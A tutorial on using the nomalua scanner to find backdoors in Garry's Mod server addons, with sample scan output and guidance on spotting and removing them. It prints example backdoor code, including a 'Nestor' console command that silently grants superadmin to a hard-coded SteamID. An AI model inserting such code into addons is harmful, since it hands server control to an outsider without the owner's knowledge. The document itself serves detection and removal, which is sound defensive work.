This little script will help you to detect backdoors that may be on your server. Don't forget, the best way to don't have backdoor: DON'T USE LEAKS!
Install Backdoor Scanner
- Download the nomalua script: here.
- Upload it in a folder
garrysmod/addons/nomaluaon your server. - Restart your server to take effect.
- Once on your server is restarted, open the console and type the command
nomalua_scan. - Your server may be laggy for about 15/20 seconds. Re-open the server console; there must be something like this:
1 - MISC (References global table) gamemodes/darkrp/gamemode/libraries/fn.lua:120 GetGlobalVar = function(key) return _G[key] end 4 - NETWORK (HTTP server call) lua/autorun/photon/cl_emv_airel.lua:17 http.Fetch( fetchUrl, 1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:52 local fileRead = file.Read( "playerlist.txt" ) 1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:92 local fileCheck = file.Read("playerlist.txt") 1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:142 file.Read( "playerlist.txt" ) 4 - NETWORK (HTTP server call) gamemodes/darkrp/gamemode/modules/darkrpmessages/cl_darkrpmessage.lua:16 http.Fetch("https://raw.github.com/FPtje/DarkRPMotd/master/motd.txt", receiveMOTD, fn.Id) 2 - AUTHENT (Presence of Steam ID) lua/autorun/tdmcars_vols60_police.lua:2 © Guillaume (STEAM_0:0:71249946) 1 - MISC (References global table) lua/includes/util.lua:267 _G[ name ] = NUM_AI_CLASSES 2 - FILESYS (File deletion) lua/includes/util/javascript_util.lua:13 html:AddFunction( "gmod", "DeleteLocal", function( param ) file.Delete( param, "MOD" ) end ) 1 - MISC (References global table) lua/includes/util/javascript_util.lua:14 html:AddFunction( "gmod", "FetchItems", function( namespace, cat, offset, perpage, ... ) _G[ namespace ]:Fetch( cat, tonumber( offset ), tonumber( perpage ), { ... } ) end ) 1 - MISC (References global table) lua/includes/util/javascript_util.lua:16 html:AddFunction( "gmod", "Publish", function( namespace, file, background ) _G[ namespace ]:Publish( file, background ) end ) [size=85][font=Helvetica Neue, Helvetica, Arial, sans-serif]2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:52 Chromebolt A.K.A. Unib5 (STEAM_0:1:19045957)[/font][/size] 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:55 Falco A.K.A. FPtje Atheos (STEAM_0:0:8944068) 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
How to find a backdoor?
- To identify a backdoor, you have to look at all SteamIDs. For example:That is not a backdoor. It's just the name of a legit player.
AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
- A backdoor looks like this:
2 - AUTHENT (Presence of Steam ID) addons/nestorro/lua/autorun/nestorro_launch.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then
- If you have:
ply:SteamID() == "STEAM_0:100000000") then
It's possibly a backdoor. You always have to check something like that! A backdoor can be something like:if ( ply:SteamID() == "STEAM_0:1:00000000") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else
How to remove a backdoor?
To remove the entire backdoor, remove the code (which can look like this):
concommand.Add( "Nestor", function(ply) if ( ply:SteamID() == "STEAM_0:0:82261024") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Bye " .. ply:Name() .. ".") end end)